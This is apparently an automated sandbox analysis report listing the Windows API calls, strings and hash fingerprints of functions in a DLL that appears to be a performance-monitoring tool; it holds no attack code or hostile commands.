                                                                                                                                                                                                                    • Instruction ID: 9f78cc1274df298ac9de1c76d220b7b11048d86d0e16b571618408d9cbcd630d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ae2c02a372ded23fb346e1d660c87c497e2450403bcf5bb002bd5bdac4a6360
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D1124F2949B2CB7D520EBB0CC09FCB77DC9F14704F404C15A2AA665D0DB65B9065FA4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetClientRect.USER32 ref: 6F210ABE
                                                                                                                                                                                                                      • Part of subcall function 6F212390: EnterCriticalSection.KERNEL32(6F24BA20), ref: 6F2123C4
                                                                                                                                                                                                                      • Part of subcall function 6F212390: GetClassInfoExW.USER32 ref: 6F2123F9
                                                                                                                                                                                                                      • Part of subcall function 6F212390: GetClassInfoExW.USER32 ref: 6F21240C
                                                                                                                                                                                                                      • Part of subcall function 6F212390: LeaveCriticalSection.KERNEL32(6F24BA20), ref: 6F212417
                                                                                                                                                                                                                      • Part of subcall function 6F2172C0: GetProcessHeap.KERNEL32(00000008,00000008,00000000,6F21221B), ref: 6F2172C5
                                                                                                                                                                                                                      • Part of subcall function 6F2172C0: HeapAlloc.KERNEL32(00000000), ref: 6F2172CC
                                                                                                                                                                                                                    • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?,?,?,?,6F238080,000000FF), ref: 6F210B07
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6F210BAC
                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6F24BA20), ref: 6F210BBA
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6F24BA20), ref: 6F210BD3
                                                                                                                                                                                                                    • CreateWindowExW.USER32 ref: 6F210C09
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CriticalSection$ClassEnterHeapInfoLeave$AllocClientCreateCurrentErrorLastProcessRectThreadWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 859899439-0
                                                                                                                                                                                                                    • Opcode ID: 1361667aeb54c4e123452f6bd818b079c661fea6566b0e6ba16f685d30461345
                                                                                                                                                                                                                    • Instruction ID: 808a936bcdf75e386cc2fcff86525dad66eb72f142f9092c9dee41fd97ec1af2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1361667aeb54c4e123452f6bd818b079c661fea6566b0e6ba16f685d30461345
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0618EB1E04609AFDB14CFA8D844BAEB7F4FF49724F10411AE916AB680D770A950CF94
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,6F21C72E,6F21C72E,?,?,?,6F22D90E,00000001,00000001,7BE85006), ref: 6F22D74E
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,00000000,?,?,?,6F22D90E,00000001,00000001,7BE85006,?,?,?), ref: 6F22D7B7
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,7BE85006,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 6F22D897
                                                                                                                                                                                                                    • __freea.LIBCMT ref: 6F22D8A4
                                                                                                                                                                                                                      • Part of subcall function 6F227F9C: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6F217DD3,00000105,000000FF,24448D6F,00000000,?,6F201817,?,00000103,000000FF), ref: 6F227FCE
                                                                                                                                                                                                                    • __freea.LIBCMT ref: 6F22D8AD
                                                                                                                                                                                                                    • __freea.LIBCMT ref: 6F22D8D2
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1414292761-0
                                                                                                                                                                                                                    • Opcode ID: 38b0aa11e472feeb06f47bb436bec38cb0d21dc4f75f035400dd4c49bba51cd9
                                                                                                                                                                                                                    • Instruction ID: 72555477f13fb11e2bdd721349dc7ab311b363e3e7a94286010959fc3bfe9241
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38b0aa11e472feeb06f47bb436bec38cb0d21dc4f75f035400dd4c49bba51cd9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1151917260421EAFEB119F64CC84EAB3BEAEF85761F510129FD1497680D774EC118EA2
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 6F216CC8
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 6F216D33
                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32 ref: 6F216D50
                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32 ref: 6F216D8F
                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32 ref: 6F216DEE
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6F216E11
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiStringWide
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2829165498-0
                                                                                                                                                                                                                    • Opcode ID: bfded5ee67fe5d39e77fef1d675c3b2f49fac0212c0b03c9b4afbe334af10c7d
                                                                                                                                                                                                                    • Instruction ID: de7a1e23589a3a048703c9f1c1790d2bcafc7813ca7b6913956bf8da986923e1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bfded5ee67fe5d39e77fef1d675c3b2f49fac0212c0b03c9b4afbe334af10c7d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38518FB251421EABEF108FA4CC84FAF3FEAEB46751F114529EA2496190D731D920CE64
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CharNextW.USER32(?,00000000,00000000,?,C000008C,00000001), ref: 6F20DF2E
                                                                                                                                                                                                                    • CharNextW.USER32(00000000,?,00000000,00000000), ref: 6F20DF5B
                                                                                                                                                                                                                    • CharNextW.USER32(770CEEF0,?,00000000,00000000), ref: 6F20DF74
                                                                                                                                                                                                                    • CharNextW.USER32(770CEEF0,?,00000000,00000000), ref: 6F20DF7F
                                                                                                                                                                                                                    • CharNextW.USER32(00000001,?,00000000,00000000), ref: 6F20DFEE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CharNext
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3213498283-0
                                                                                                                                                                                                                    • Opcode ID: 3c22efb0f9b466a104946ad8c12ca68fb799a01c0302977d50ccf34b9edc8583
                                                                                                                                                                                                                    • Instruction ID: e9344cafaca892cb0b2c5823bfce5217227f4ec72f9ad71895e39a3a2964ba2f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c22efb0f9b466a104946ad8c12ca68fb799a01c0302977d50ccf34b9edc8583
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C041F73760051ACFCB10EF28C4846A9B7F3EF99321B948566E844DB358EB31A991CF94
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6F204819
                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6F20483B
                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6F20485B
                                                                                                                                                                                                                    • __Getctype.LIBCPMT ref: 6F2048F1
                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 6F204910
                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6F204928
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1102183713-0
                                                                                                                                                                                                                    • Opcode ID: 8b3914d39db678feb382f0a3e7066b842f2d17fccc670cbb250e71c862d27e29
                                                                                                                                                                                                                    • Instruction ID: 8403ac3ba4ad9803f0e642850c3c8e243c982f6c3cf10b461f55c05aaa4f1397
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b3914d39db678feb382f0a3e7066b842f2d17fccc670cbb250e71c862d27e29
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B841AD72D0475D9BCB10EF58C840AAAB7F4FF19724F1481ADD805AB681EB31A948CFD1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F20D4B0: GetModuleHandleW.KERNEL32(Advapi32.dll,A9775A74), ref: 6F20D504
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 6F20D602
                                                                                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 6F20D64A
                                                                                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 6F20D683
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 6F20D698
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 6F20D6C0
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 6F20D6E8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Close$Enum$HandleModule
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2852649468-0
                                                                                                                                                                                                                    • Opcode ID: 9b263727bbd845abc2a80931ca5dce8135c9ff50aa0efa9b2f5c0da1bdfdc813
                                                                                                                                                                                                                    • Instruction ID: 7937a8835bc55d919ace2566f5a47210dbb380e577947733ecfd5379ae751035
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b263727bbd845abc2a80931ca5dce8135c9ff50aa0efa9b2f5c0da1bdfdc813
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14419FB26093055BD710EF55E844B6BB7E9EF88315F40492EF998D7280DB30E904CFA6
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(6F200000,?,00000104), ref: 6F20F65C
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 6F20F814
                                                                                                                                                                                                                      • Part of subcall function 6F207AE0: RaiseException.KERNEL32(?,?,00000000,00000000), ref: 6F207AED
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Module$ExceptionFileHandleNameRaise
                                                                                                                                                                                                                    • String ID: Module$Module_Raw$REGISTRY
                                                                                                                                                                                                                    • API String ID: 1728487212-549000027
                                                                                                                                                                                                                    • Opcode ID: 816a505003b97f38fddde61e8717e506bf1f659d8865cee001a92fcb0a4a2a7d
                                                                                                                                                                                                                    • Instruction ID: 39905ee90a3de894e71677a02817e565603e3aec72f10d4b3801a536abd377a7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 816a505003b97f38fddde61e8717e506bf1f659d8865cee001a92fcb0a4a2a7d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17D16076A4172D8BDB28EB24DC50B9F73B4FF45305F0001A9D91EA7A40EB75AA84CF46
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000001,?,6F2180DC,6F2141B6,6F214839,?,6F214A71,?,00000001,?,?,00000001,?,6F2486F8,0000000C,6F214B6A), ref: 6F2199FA
                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6F219A08
                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6F219A21
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,6F214A71,?,00000001,?,?,00000001,?,6F2486F8,0000000C,6F214B6A,?,00000001,?), ref: 6F219A73
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                                    • Opcode ID: de7f8ae571875f262c1df79b2b06a7502aec08b83cd7b6b23b14a6d994c2495c
                                                                                                                                                                                                                    • Instruction ID: 77426390e911217c5c6d92875f8f433e30ac70a9f8afea40bfc60f89018f6ce3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de7f8ae571875f262c1df79b2b06a7502aec08b83cd7b6b23b14a6d994c2495c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F01F53221E71A5FEB14A5749C8C74B3BE9DF02BBA720132AE720498D4FF91482D8D48
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6F215983
                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6F21598D
                                                                                                                                                                                                                      • Part of subcall function 6F202140: std::_Lockit::_Lockit.LIBCPMT ref: 6F20215D
                                                                                                                                                                                                                      • Part of subcall function 6F202140: std::_Lockit::~_Lockit.LIBCPMT ref: 6F202179
                                                                                                                                                                                                                    • codecvt.LIBCPMT ref: 6F2159C7
                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 6F2159DE
                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6F2159FE
                                                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 6F215A0B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2133458128-0
                                                                                                                                                                                                                    • Opcode ID: 837a39abb2e9d985d5afff0e85c5220af6c6c18eea4e0a6b868dd822818e522b
                                                                                                                                                                                                                    • Instruction ID: cfc7622d401d09ccb3d05f6b42ebbde7393f7331a2ced4bba4321b111fdd4014
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 837a39abb2e9d985d5afff0e85c5220af6c6c18eea4e0a6b868dd822818e522b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F01087380472E8BCB04EF68C445AAEBBB1AF45728F100549D611AF6C0CF749905CFD5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F20AEB0: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,A9775A74,?), ref: 6F20ACF7
                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,edit,?,00000000,00000000,00000001), ref: 6F2105E8
                                                                                                                                                                                                                    • PdhRemoveCounter.PDH(?,?,00000000), ref: 6F210683
                                                                                                                                                                                                                    • PdhCloseQuery.PDH(?,?,00000000), ref: 6F210698
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseCounterExecuteFolderPathQueryRemoveShell
                                                                                                                                                                                                                    • String ID: 0$edit
                                                                                                                                                                                                                    • API String ID: 2809573910-562573004
                                                                                                                                                                                                                    • Opcode ID: eb92043aa1a3b828ebaf00ddf43ae9e1e7e92eac000a1fb9d15fba986eb88b60
                                                                                                                                                                                                                    • Instruction ID: 517d414f27ff833d4d0496cd9f3fa129541832e2c17b9dce8697a682f2e84b2b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb92043aa1a3b828ebaf00ddf43ae9e1e7e92eac000a1fb9d15fba986eb88b60
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE9100726083098FD704DF28C880B9AB7E5BF85318F10461DEA949B690D732F9A4CFD6
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                    • String ID: *?$.
                                                                                                                                                                                                                    • API String ID: 269201875-3972193922
                                                                                                                                                                                                                    • Opcode ID: 31cf4a464588e9662cbe7de42673691b9a0f35b521f8d931fa172eff98d6277e
                                                                                                                                                                                                                    • Instruction ID: 7eaa9728e2402e11ee1f0cc473c7d6f94e356984478eac25e6d67d094ceeb562
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31cf4a464588e9662cbe7de42673691b9a0f35b521f8d931fa172eff98d6277e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 036108B6E0421E9FDB04CFA8C9919EDFBF5EF48314B2441AAD855A7340E735AA418F90
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,6F21AB58,00000000,?,00000001,00000000,?,6F21ABCF,00000001,FlsFree,6F23AE3C,FlsFree,00000000), ref: 6F21AB27
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                                    • API String ID: 3664257935-2084034818
                                                                                                                                                                                                                    • Opcode ID: e5adb99c77cac4e38f3a7b0aa75b43f5e1f7136089ea9480351d716e3c0278a0
                                                                                                                                                                                                                    • Instruction ID: 48c9b7b7d4bf65137637238e0d9e4bcace6025c229f9bf0be060fba738951863
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e5adb99c77cac4e38f3a7b0aa75b43f5e1f7136089ea9480351d716e3c0278a0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63110AB2A4D669A7DF32CA689D55B4933F6EF12771F100221EA10EB180D770FA14CED5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • InsertMenuW.USER32(?,?,00000C00,?,00000000), ref: 6F210CFA
                                                                                                                                                                                                                    • InsertMenuW.USER32(?,?,00000400,?,Performance Monitor - (Reload Configuration)), ref: 6F210D0E
                                                                                                                                                                                                                    • InsertMenuW.USER32(?,?,00000400,?,Performance Monitor - (Edit Configuration)), ref: 6F210D22
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Performance Monitor - (Reload Configuration), xrefs: 6F210CFC
                                                                                                                                                                                                                    • Performance Monitor - (Edit Configuration), xrefs: 6F210D10
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: InsertMenu
                                                                                                                                                                                                                    • String ID: Performance Monitor - (Edit Configuration)$Performance Monitor - (Reload Configuration)
                                                                                                                                                                                                                    • API String ID: 1478380399-4081388356
                                                                                                                                                                                                                    • Opcode ID: 75eb1633f7638876f0fb5f90e3b398434e9456fb3775bdeff57e44e92a3dd6b1
                                                                                                                                                                                                                    • Instruction ID: c83b09d03ada3ed45ee7521064bda4b50896316b04905ac6af0af3927974706c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75eb1633f7638876f0fb5f90e3b398434e9456fb3775bdeff57e44e92a3dd6b1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8F03A7324021D7BEB11DE859C80FAB7BACFB49620F154016FF14A6181C2B1A9229FB8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6F224E49,?,?,6F224E11,?,00000000), ref: 6F224EB8
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6F224ECB
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,6F224E49,?,?,6F224E11,?,00000000), ref: 6F224EEE
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
